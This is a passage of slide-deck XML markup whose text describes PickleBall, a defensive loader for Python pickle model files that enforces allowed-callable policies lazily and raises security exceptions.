              <a:t>Restricted Loader</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1219" name="Google Shape;1219;p98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1452577" y="1992928"/>
            <a:ext cx="630600" cy="606300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="19125">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91625" lIns="91625" spcFirstLastPara="1" rIns="91625" wrap="square" tIns="91625">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1402"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1220" name="Google Shape;1220;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1452577" y="1992927"/>
            <a:ext cx="630405" cy="606068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1221" name="Google Shape;1221;p98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1177425" y="3710825"/>
            <a:ext cx="1092000" cy="615000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt1"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="10475">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Loading Policy</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1222" name="Google Shape;1222;p98"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2320625" y="4018325"/>
            <a:ext cx="1590300" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="31500">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1223" name="Google Shape;1223;p98"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2241800" y="2338825"/>
            <a:ext cx="1679100" cy="688800"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="31500">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1224" name="Google Shape;1224;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1213671" y="1800712"/>
            <a:ext cx="563087" cy="525483"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1225" name="Google Shape;1225;p98"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5546349" y="3141134"/>
            <a:ext cx="688200" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="31500">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1226" name="Google Shape;1226;p98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6221788" y="2252722"/>
            <a:ext cx="1092000" cy="603600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C2F4"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="10475">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1543">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Loaded Model</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1227" name="Google Shape;1227;p98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1010175" y="1454725"/>
            <a:ext cx="1426500" cy="434700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Pickle Model</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1228" name="Google Shape;1228;p98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6516368" y="2980667"/>
            <a:ext cx="502800" cy="407400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1323">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>OR</a:t>
            </a:r>
            <a:endParaRPr sz="1323">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1229" name="Google Shape;1229;p98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6164559" y="3460128"/>
            <a:ext cx="1206300" cy="808800"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="10475">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="100850" lIns="100850" spcFirstLastPara="1" rIns="100850" wrap="square" tIns="100850">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1543">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Security Exception</a:t>
            </a:r>
            <a:endParaRPr sz="1543">
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1230" name="Google Shape;1230;p98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2241800" y="5531050"/>
            <a:ext cx="3911100" cy="2955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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>PickleBall provides a </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>drop-in replacement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> for the pickle module. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Raises security exceptions when opcodes import or invoke disallowed callables.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>PickleBall loads policies </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>lazily</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> to account for missing but unimportant callables. </a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>When a missing callable is imported, PickleBall creates a stub object and defers raising a security exception until the stub object is </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>invoked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inter Light"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Intuition: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>some attributes are added to the model as metadata after instantiation. If these are not used during deserialization or inference, they do not need to be instantiated.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1231" name="Google Shape;1231;p98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5357000" y="838675"/>
            <a:ext cx="3515400" cy="525600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Enforcement module is a modified Pickle Machine</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1232" name="Google Shape;1232;p98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5357000" y="1513850"/>
            <a:ext cx="3515400" cy="525600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Enforces policies </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>lazily</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> to account for </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>missing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> but </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>unimportant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> callables</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide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1236" name="Shape 1236"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1237" name="Google Shape;1237;p99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Policy Enforcement</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1238" name="Google Shape;1238;p99"/>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1239" name="Google Shape;1239;p99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3902825" y="2252725"/>
            <a:ext cx="1590300" cy="2119500"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="8775">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="83975" lIns="83975" spcFirstLastPara="1" rIns="83975" wrap="square" tIns="83975">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Policy Enforcement</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
